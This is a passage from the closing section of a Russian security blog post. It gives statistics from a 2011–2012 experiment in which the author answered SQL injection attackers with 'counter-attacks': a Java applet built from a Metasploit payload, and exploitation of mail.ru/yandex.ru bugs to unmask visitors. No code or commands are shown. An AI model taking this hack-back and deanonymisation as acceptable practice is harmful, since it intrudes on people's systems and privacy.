СтатистикаВ конце немного статистики. Эксперимент длился с Q2 2011 до Q3 2012.
Всего УНИКАЛЬНЫХ атак SQLi - 484 (за ~1.2 года)
Из них успешных контр-атак (Java Applet) - 52 (за ~1.2 года)
Из них успешных контр-атак на mail.ru/yandex.ru - 16 (за 6 месяцев)
~ 17 % успеха при контр-атаках.
График зависимости:
Как видно, в начале был апплет, а «мыло» я добавил значительно позже. Пики по посещаемости связаны с анонсами ZeroNights и встреч Defcon группы. Пробив по почте фактически линейный, тогда как в случае апплетов -зависимость была линейной лишь в начале эксперимента. Это связано с обновлениями Java, антивирусы добавили апплет потом в базу вредоносного ПО (что неудивительно ибо он собран из metasploit пейлода)
P.S. Кстати, если с yandex.ru есть куда сообщать о найденных мной багах, то в случае с mail.ru я не нашел контакты, пока не познакомился с тамошним ИБшником и не слил багу ему лично…
ВыводыХоть этот блог-пост больше о том как я ловил «плохих» парней, хотя на самом деле это можно экстраполировать на вопросы анонимности в сети Интернет - уж если ИТ/ИБ специалисты и хацкеры палятся, то что говорить о нормальных людях? Вполне очевидно, что TOR/Proxy и VPN не помогают в этом вопросе. Достаточно логина в соц.сети, невнимательности и еще много чего, чтобы однозначно сопоставить посетителя веб-ресурса с реальным человеком. Будьте аккуратнее и JFYI: Как работают настоящие зло-хакИры